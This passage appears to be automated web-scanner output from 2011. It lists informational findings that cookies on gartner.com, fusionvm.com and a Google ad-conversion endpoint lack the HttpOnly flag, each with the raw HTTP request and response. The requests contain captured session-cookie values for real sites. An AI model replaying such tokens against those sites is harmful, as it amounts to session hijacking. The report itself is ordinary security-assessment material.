Cookie: tnt=3; PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=PC#1303736347554-914602.17#1304952755|check#true#1303743215|session#1303743154006-383984#1303745015; __utma=1.1646584456.1303732844.1303735979.1303743158.3; __utmc=1; __utmb=1.1.10.1303743158; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D3%7C1335268844052%3B%20s_visit%3D1%7C1303744959492%3B%20gpv_pageName%3Dus/new_homepage%7C1303744959494%3B%20s_nr%3D1303743159496-Repeat%7C1335279159496%3B%20s_invisit%3Dtrue%7C1303744959497%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=deleted; expires=Sun, 25-Apr-2010 15:16:46 GMT
Set-Cookie: tnt=3; expires=Fri, 24-Jun-2011 15:16:47 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26704
Date: Mon, 25 Apr 2011 15:16:47 GMT
X-Varnish: 555652739
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...

16.167. https://www.fusionvm.com/FusionVM/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fusionvm.com
Path:   /FusionVM/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FusionVM/ HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQQASDQQ=MNOLHEFCGKBHGOHLANCBPEKB

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: CriticalWatch_WinMgmt=a623626d-8fc7-42a5-b103-e9b75ad79594; expires=Mon, 25-Apr-2011 13:19:53 GMT; path=/
Set-Cookie: ASP.NET_SessionId=z4su31o2100elwiksplqkftw; path=/; HttpOnly
Date: Mon, 25 Apr 2011 12:54:52 GMT
Content-Length: 170

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.fusionvm.com/FusionVM/DesktopDefault.aspx">here</a>.</h2>
</body></html>

16.168. http://www.gartner.com/0_admin/css/documentdisplay.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /0_admin/css/documentdisplay.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /0_admin/css/documentdisplay.css;pvc271f234619de471 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Content-type: text/css
Last-modified: Fri, 25 Feb 2011 23:13:43 GMT
ETag: "pvc271f234619de471c86331d0781b0d8c"
Expires: Sat, 15 Oct 2011 01:46:25 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A151050.RA0.G24F27.U45C73E2A].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:15 GMT
Age: 1593
Set-Cookie: TS83f541=f05c972c9edfede56a32664676fbba226bee90621e4ceb474db564e2; Path=/
Content-Length: 11084

/* TAG STYLES */
a {
color:#308ACF;
text-decoration: none;
}
a:hover {
text-decoration: underline;
}
ul {
list-style:disc;
}
body {
font-family: Verdana, Geneva, Arial, Helv
...[SNIP]...

16.169. http://www.gartner.com/0_admin/css/docverterNGRA.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /0_admin/css/docverterNGRA.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /0_admin/css/docverterNGRA.css;pv5baab6279b42fad0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Content-type: text/css
Last-modified: Fri, 25 Feb 2011 23:13:44 GMT
ETag: "pv5baab6279b42fad0267d731fc0b91143"
Expires: Sat, 15 Oct 2011 01:46:25 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A151050.RA0.G24F27.U837B2039].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:16 GMT
Age: 1594
Set-Cookie: TS83f541=6b2da585a63dda664aed29accddacf18a0a6c3165b9afd464db564e3; Path=/
Content-Length: 10459

/* stylesheet extracted from owner.html (originally update.html) */

.dv_tableTextIndent1 {
font-family: Verdana, Geneva, Arial, Helvetica, sans-serif;
font-size: 75%;
font-style: normal
...[SNIP]...

16.170. http://www.gartner.com/0_admin/images/documentdisplay/blue_gt_bullet.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /0_admin/images/documentdisplay/blue_gt_bullet.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /0_admin/images/documentdisplay/blue_gt_bullet.gif;pvfba64ef8951859f0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Content-type: image/gif
Last-modified: Fri, 25 Feb 2011 23:13:43 GMT
ETag: "pvfba64ef8951859f02fde94375233778f"
Expires: Wed, 19 Oct 2011 00:02:34 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A151075.RA0.G24F27.U3CEF9F60].[OT/images.OG/images]
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:19 GMT
Age: 6798
Content-Length: 53
Set-Cookie: TS83f541=aba30e374a2f00546378de7d4c8c3d19fd2bfd7686808ebd4db564e7; Path=/

GIF89a
......0.....!.......,....
.........y...|MV...;

16.171. http://www.gartner.com/0_admin/images/documentdisplay/blue_v_bullet.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /0_admin/images/documentdisplay/blue_v_bullet.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /0_admin/images/documentdisplay/blue_v_bullet.gif;pvf70f576bef1d3ed9 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Content-type: image/gif
Last-modified: Fri, 25 Feb 2011 23:13:42 GMT
ETag: "pvf70f576bef1d3ed914b4c704f3d7d488"
Expires: Sat, 15 Oct 2011 01:48:24 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A151075.RA0.G24F27.UA511F917].[OT/images.OG/images]
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:19 GMT
Age: 6519
Content-Length: 54
Set-Cookie: TS83f541=f92d843d05fbcc91242d73f86afd887b35a0406515b877a04db564e7; Path=/

GIF89a
......0.....!.......,....
...........B.M.jm..;

16.172. http://www.gartner.com/0_admin/images/documentdisplay/dl_pdf.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /0_admin/images/documentdisplay/dl_pdf.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /0_admin/images/documentdisplay/dl_pdf.gif;pv645290f3cec6f422 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Content-type: image/gif
Last-modified: Fri, 25 Feb 2011 23:13:43 GMT
ETag: "pv645290f3cec6f4224870b721aa89cdc0"
Expires: Sat, 15 Oct 2011 01:59:12 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A151075.RA0.G24F27.UE046FD5E].[OT/images.OG/images]
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:19 GMT
Age: 3681
Content-Length: 167
Set-Cookie: TS83f541=0368e5dfa99e4c7c60288dc0b1bfc0e6c6ad2c65177a6bb94db564e7; Path=/

GIF89a-......333fff......!.......,....-.....x........a....fzYm.hu...*f..
........N...8.x..h9..H..2....e.*.;A.FI...;(pz....-(.K...QN./.H..yoGT...F..WH...h.....@YiY..;

16.173. http://www.gartner.com/0_admin/images/documentdisplay/gartner_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /0_admin/images/documentdisplay/gartner_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /0_admin/images/documentdisplay/gartner_logo.gif;pv0fa3dd26dbfd16cf HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Content-type: image/gif
Last-modified: Fri, 25 Feb 2011 23:13:42 GMT
ETag: "pv0fa3dd26dbfd16cf7bf6517dac53138e"
Expires: Sat, 15 Oct 2011 01:48:24 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A151075.RA0.G24F27.UCBD93627].[OT/images.OG/images]
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:18 GMT
Age: 6545
Content-Length: 683
Set-Cookie: TS83f541=c4a433b35f9229efc4f43fa5771e388590ef3992c872d9cb4db564e6; Path=/

GIF89af.#.............uuu```jjj..............................UUU.............................................!.......,....f.#.... $.di.h..l..p,.tm.x..|....pH,..HWC.h"..h.pxX.... .B...U..&...!Wh:....kx
...[SNIP]...

16.174. http://www.gartner.com/0_admin/images/documentdisplay/gray_gt_bullet.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /0_admin/images/documentdisplay/gray_gt_bullet.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /0_admin/images/documentdisplay/gray_gt_bullet.gif;pv01523c4179af4095 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Content-type: image/gif
Last-modified: Fri, 25 Feb 2011 23:13:43 GMT
ETag: "pv01523c4179af4095ceb8d97f4e60e435"
Expires: Sat, 15 Oct 2011 01:48:24 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A151075.RA0.G24F27.UB19576C9].[OT/images.OG/images]
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:18 GMT
Age: 2201
Content-Length: 54
Set-Cookie: TS83f541=8153a0f0aebadf3529c552e0069558fe46a150634031125f4db564e6; Path=/

GIF89a    .    ....0Pf...!.......,....    .    .....y....Ts5z.*.;

16.175. http://www.gartner.com/0_admin/images/documentdisplay/research_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /0_admin/images/documentdisplay/research_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /0_admin/images/documentdisplay/research_logo.gif;pv0f8cc4fa2994f3d2 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Content-type: image/gif
Last-modified: Fri, 25 Feb 2011 23:13:44 GMT
ETag: "pv0f8cc4fa2994f3d2727b91b04e34e9bc"
Expires: Sat, 15 Oct 2011 01:50:09 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A151075.RA0.G24F27.U7BFAEE3F].[OT/images.OG/images]
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:18 GMT
Age: 5032
Content-Length: 620
Set-Cookie: TS83f541=55932c82d7bffac30a01820f4d53983643af129e3519d40b4db564e6; Path=/

GIF89aw.#..........```.........wwwlll.....................UUU!.......,....w.#......I..8....`(.di.h..l..p,.tm.x..|..@..@,..A...k8..g......g`.%<.U...%S..G!,...f
..h4........
.u.H.....u..
...c...3s.N...
...[SNIP]...

16.176. http://www.gartner.com/DisplayDocument  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /DisplayDocument

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DisplayDocument?doc_cd=127481 HTTP/1.1
Host: www.gartner.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WebLogicSession=cSYnN1vJnb1Nx84rkvK9h3y2Z1JSqHc4Q7GnchMG2ZDySdxm2Pns!475228577; TS83f541=f40dc0e11f368c4df2fa775e78c36fb10621405c7f8621844db56269; WT_FPC=id=173.193.214.243-1722167968.30147392:lv=1303732853510:ss=1303732853510
If-None-Match: "pv33052ebdba339285631c49a7e3f502be"

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: Servlet/2.5 JSP/2.1
Content-type: text/html; charset=iso-8859-1
Date: Mon, 25 Apr 2011 12:10:49 GMT
ETag: "pv33052ebdba339285631c49a7e3f502be"
Expires: 0
Cache-Control: must-revalidate, no-cache
Pragma: no-cache
X-PvInfo: [S10202.C10821.A151087.RA0.G24F28.UC3B8E66B].[OT/html.OG/pages]
Vary: Accept-Encoding
Set-Cookie: TS83f541=32d23d3d5a761af07eb8e7078f5d2a8c0621405c7f8621844db564c8; Path=/
Content-Length: 29490

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Improve IT Security With Vulnerability Management</title>
<meta http-equiv=Content-Type content="text/html; ch
...[SNIP]...

16.177. http://www.gartner.com/images/x.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /images/x.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/x.gif;pv0ef9116c348ac829 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Content-type: image/gif
Last-modified: Fri, 25 Feb 2011 23:13:44 GMT
ETag: "pv0ef9116c348ac829060bb55f994d5974"
Expires: Sat, 15 Oct 2011 01:48:24 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A150953.RA0.G24F27.U9481F6C2].[OT/images.OG/images]
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:18 GMT
Age: 6518
Content-Length: 43
Set-Cookie: TS83f541=f398a42a900447acbbf881d8c89365b982b76feb75cf37d54db564e6; Path=/

GIF89a.............!.......,............Q.;

16.178. http://www.gartner.com/js/utility.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /js/utility.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/utility.js;pv1a5d4f2c9f594bc0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Content-type: application/x-javascript
Last-modified: Fri, 25 Feb 2011 23:13:42 GMT
ETag: "pv1a5d4f2c9f594bc0880fa3d283482a64"
Expires: Sat, 15 Oct 2011 01:45:58 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A150946.RA0.G24F27.UF4CE7865].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:17 GMT
Age: 925
Set-Cookie: TS83f541=6122e271e953b2f4fbd9c22dfd419e57ca690f7bec2de55c4db564e5; Path=/
Content-Length: 29773

// Utility.js - Copyright (c) 2000, 2001, 2002 Gartner Inc. All rights reserved.
// Modified clickBetaSearchLink() method to open BetaSearchLanding.jsp for g.com 6.12
// --Shrileckha Chaithanya


...[SNIP]...

16.179. http://www.gartner.com/js/webtrendsCookies.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /js/webtrendsCookies.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/webtrendsCookies.js;pv072e3556793072f4 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Content-type: application/x-javascript
Last-modified: Fri, 25 Feb 2011 23:13:43 GMT
ETag: "pv072e3556793072f426af3f74ac54883a"
Expires: Sat, 15 Oct 2011 01:45:56 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A150946.RA0.G24F27.U74878798].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:19 GMT
Age: 4918
Set-Cookie: TS83f541=0b6ddca919a34ed950a9046c9610c06d9fb938034b32c76f4db564e7; Path=/
Content-Length: 1124

<!-- START OF SDC Cookie Code -->
<!-- Copyright (c) 1996-2005 WebTrends Inc. All rights reserved. -->
<!-- $DateTime: 2006/03/08 11:31:03 $ -->
var logServer="";
if ((window.location.hostname ==
...[SNIP]...

16.180. http://www.googleadservices.com/pagead/conversion/1069716420/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1069716420/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/conversion/1069716420/?random=1303743156487&cv=6&fst=1303743156487&num=1&fmt=3&value=0&label=dwuECKKVsQEQxKeK_gM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=5&u_tz=-300&u_java=true&u_nplug=9&u_nmime=44&url=http%3A//www.eset.com/us/ HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Conversion=CoQBQ09EekZUV0sxVGJfZ0U0R2cwQUdYN3JSRWtxN3kxZ0dDdWRIcEY2aW4xelFRQlNnSVVPYkkxSkwtX19fX193Rmd5ZTZEaVBDajdCS2dBY1NuaXY0RHlBRUJxZ1FkVDlCM25fb29MRUpqNG1qVURxN2pSSnI5MHJYMUcyRzF1anlTVWI4EhMIvOfSos-3qAIVCX_lCh3hL5EIGAEgm5-68LGAgJTgAUgB

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Date: Mon, 25 Apr 2011 15:14:28 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
Set-Cookie: Conversion=CoQBQ09EekZUV0sxVGJfZ0U0R2cwQUdYN3JSRWtxN3kxZ0dDdWRIcEY2aW4xelFRQlNnSVVPYkkxSkwtX19fX193Rmd5ZTZEaVBDajdCS2dBY1NuaXY0RHlBRUJxZ1FkVDlCM25fb29MRUpqNG1qVURxN2pSSnI5MHJYMUcyRzF1anlTVWI4EhMIvOfSos-3qAIVCX_lCh3hL5EIGAAglMmkrsK0tcwiSAE; expires=Wed, 25-May-2011 12:00:31 GMT; path=/pagead/conversion/1069716420/
Location: http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1069716420/?random=1303743156487&cv=6&fst=1303743156487&num=1&fmt=3&value=0&label=dwuECKKVsQEQxKeK_gM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=5&u_tz=-300&u_java=true&u_nplug=9&u_nmime=44&url=http%3A//www.eset.com/us/&ctc_id=CAEVAQAAAB0BAAAA&ct_cookie_present=true
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 42
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D.;

16.181. http://www.googleadservices.com/pagead/conversion/1072501689/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1072501689/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/conversion/1072501689/?random=1303733542110&cv=6&fst=1303733542110&num=1&fmt=1&value=1&label=pageview&bg=FFFFFF&hl=en&gl=US&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=3&u_tz=-300&u_java=true&u_nplug=9&u_nmime=44&ref=http%3A//www.manageengine.com/products/security-manager/store.html&url=http%3A//www.manageengine.com/products/security-manager/download.html HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/download.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Conversion=CoMBQ0NlaVJUV0sxVGJfZ0U0R2cwQUdYN3JSRWtLcXFINWFWb05BT19aMkZXUkFJS0FoUWo1T1c2UF9fX19fX0FXREo3b09JOEtQc0VxQUJ1YWUwX3dQSUFRR3FCQjFQMENmTDFTZ3NRV1BpYU5RT3J1TWttYjNZdGZVYlliVzZQSkpSdncSEwi_vf-kz7eoAhUE3uAKHZUYjgsYASDO0K-h-qz6mWtIAQ

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Date: Mon, 25 Apr 2011 12:12:12 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Set-Cookie: Conversion=CoMBQ0NlaVJUV0sxVGJfZ0U0R2cwQUdYN3JSRWtLcXFINWFWb05BT19aMkZXUkFJS0FoUWo1T1c2UF9fX19fX0FXREo3b09JOEtQc0VxQUJ1YWUwX3dQSUFRR3FCQjFQMENmTDFTZ3NRV1BpYU5RT3J1TWttYjNZdGZVYlliVzZQSkpSdncSEwi_vf-kz7eoAhUE3uAKHZUYjgsYACCrq-zczvrRxb0BSAE; expires=Wed, 25-May-2011 12:00:36 GMT; path=/pagead/conversion/1072501689/
Location: http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072501689/?random=1303733542110&cv=6&fst=1303733542110&num=1&fmt=1&value=1&label=pageview&bg=FFFFFF&hl=en&gl=US&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=3&u_tz=-300&u_java=true&u_nplug=9&u_nmime=44&ref=http%3A//www.manageengine.com/products/security-manager/store.html&url=http%3A//www.manageengine.com/products/security-manager/download.html&ctc_id=CAEVAQAAAB0BAAAA&ct_cookie_present=true
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 378

